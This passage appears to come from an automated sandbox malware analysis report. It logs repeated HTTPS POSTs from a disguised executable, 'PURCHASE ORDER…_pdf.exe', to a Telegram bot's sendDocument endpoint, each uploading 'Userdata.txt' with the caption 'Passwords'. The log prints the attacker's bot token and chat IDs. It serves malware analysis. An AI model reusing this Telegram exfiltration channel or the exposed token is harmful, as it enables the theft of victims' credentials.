                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd22ac5e509c19
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  2024-12-19 14:30:33 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 32 61 63 35 65 35 30 39 63 31 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd22ac5e509c19Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-19 14:30:34 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Thu, 19 Dec 2024 14:30:34 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 543
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-19 14:30:34 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 37 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 36 33 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":19673,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618634,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  14192.168.2.549904149.154.167.2204434796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-19 14:30:37 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd22f9f12f692d
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  2024-12-19 14:30:37 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 32 66 39 66 31 32 66 36 39 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd22f9f12f692dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-19 14:30:37 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Thu, 19 Dec 2024 14:30:37 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 543
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-19 14:30:37 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 37 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 36 33 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":19675,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618637,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  15192.168.2.549917149.154.167.2204434796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-19 14:30:41 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd236cd1f171f8
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  2024-12-19 14:30:41 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 33 36 63 64 31 66 31 37 31 66 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd236cd1f171f8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-19 14:30:42 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Thu, 19 Dec 2024 14:30:42 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 543
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-19 14:30:42 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 37 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 36 34 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":19677,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618642,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  16192.168.2.549925149.154.167.2204434796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-19 14:30:45 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd23e52094dd2b
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  2024-12-19 14:30:45 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 33 65 35 32 30 39 34 64 64 32 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd23e52094dd2bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-19 14:30:45 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Thu, 19 Dec 2024 14:30:45 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 543
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-19 14:30:45 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 36 34 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":19679,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618645,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  17192.168.2.549937149.154.167.2204434796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-19 14:30:49 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd24984b8325b7
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  2024-12-19 14:30:49 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 34 39 38 34 62 38 33 32 35 62 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd24984b8325b7Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-19 14:30:50 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Thu, 19 Dec 2024 14:30:50 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 543
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-19 14:30:50 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 36 35 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":19681,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618650,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  18192.168.2.549947149.154.167.2204434796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-19 14:30:53 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd252256b0581f
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-19 14:30:53 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 35 32 32 35 36 62 30 35 38 31 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd252256b0581fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-19 14:30:53 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Thu, 19 Dec 2024 14:30:53 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 543
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-19 14:30:53 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 36 35 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":19683,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618653,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  19192.168.2.549955149.154.167.2204434796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-19 14:30:56 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd25bb05fd59f6
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-19 14:30:56 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 35 62 62 30 35 66 64 35 39 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd25bb05fd59f6Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-19 14:30:57 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Thu, 19 Dec 2024 14:30:57 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 543
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-19 14:30:57 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 36 35 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":19685,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618657,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  20192.168.2.549967149.154.167.2204434796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
